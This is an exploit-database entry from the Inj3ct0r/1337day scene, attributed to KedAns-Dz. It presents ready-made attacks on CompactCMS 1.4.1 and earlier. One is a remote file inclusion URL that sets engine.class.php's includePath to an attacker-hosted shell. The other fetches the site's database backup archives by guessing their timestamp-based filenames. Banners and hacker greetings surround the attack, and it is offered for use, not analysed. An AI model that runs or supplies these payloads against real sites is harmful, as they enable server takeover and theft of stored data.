CompactCMS <= 1.4.1 (RFI/RFD) Multiple Vulnerability

2011-04-19T00:00:00
ID 1337DAY-ID-15884
Type zdt
Reporter KedAns-Dz
Modified 2011-04-19T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : CompactCMS <= 1.4.1 (RFI/RFD) Multiple Vulnerability
# E-mail : [email protected] | [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : php
# Impact : (Remote File Inclusion / Remote File Disclosure ) Vulnerability
# Tested on : Windows XP sp3 FR & Linux.(Ubuntu 10.10) En
###
# Note : BAC 2011 Enchallah ( Me & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
##
# [è’¸ ~ special thanks to All Inj3cT0r Team
###

# Exploit : 

# Bug (1) [RFI] Remote File Inclusion =>
 
http://[localhost]/[path]/lib/class/engine.class.php?includePath=[Ev!L-Sh3ll]

# Bug (2) [RFD] Remote File Disclosure =>

(!) Download Backup Database :

> Demo : http://[localhost]/[path]/media/files/20110415_205538-data.zip

> Vulne : http://[localhost]/[path]/media/files/{Y%M%D}_{H%Mn%S}-data.zip

%{
Y = year
M = month
D = day
H = hour
Mn = minute 
S = second 
}%

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
# Masimovic * TOnyXED * jos_ali_joe (exploit-id.com) * r0073rt (Inj3ct0r.com) * TreX (hotturks.org) 
# Nayla Festa * all (sec4ever.com) Members * KelvinX (kelvinx.net) * PLATEN (Pentesters.ir)
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
# www.1337day.com * exploit-id.com * www.packetstormsecurity.org * bugsearch.net
# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
#================================================================================================



#  0day.today [2018-01-09]  #